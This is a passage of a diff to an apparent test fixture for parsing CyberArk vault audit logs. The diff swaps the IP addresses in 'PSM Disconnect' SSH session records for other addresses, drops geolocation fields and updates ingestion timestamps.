Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1104,39 +1006,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1153,7 +1034,7 @@ }, "@timestamp": "2021-03-15T10:33:30.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1164,16 +1045,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:33:30Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1185,14 +1065,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "29f340df-89e9-405a-beae-0216390cda42", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:01:35" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1202,9 +1082,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 03:33:30", "desc": "PSM Disconnect" @@ -1216,8 +1096,8 @@ "event": { "severity": 2, "duration": 95000000000, - "ingested": "2021-06-09T10:24:31.624817Z", - "original": "\u003c5\u003e1 2021-03-15T10:33:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:30\",\"IsoTimestamp\":\"2021-03-15T10:33:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813817400Z", + "original": "\u003c5\u003e1 2021-03-15T10:33:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:30\",\"IsoTimestamp\":\"2021-03-15T10:33:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1240,39 +1120,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1289,7 +1148,7 @@ }, "@timestamp": "2021-03-15T10:34:50.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1300,16 +1159,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:34:50Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1321,14 +1179,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:01:13" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1338,9 +1196,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 03:34:50", "desc": "PSM Disconnect" @@ -1352,8 +1210,8 @@ "event": { "severity": 2, "duration": 73000000000, - "ingested": "2021-06-09T10:24:31.624819600Z", - "original": "\u003c5\u003e1 2021-03-15T10:34:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" 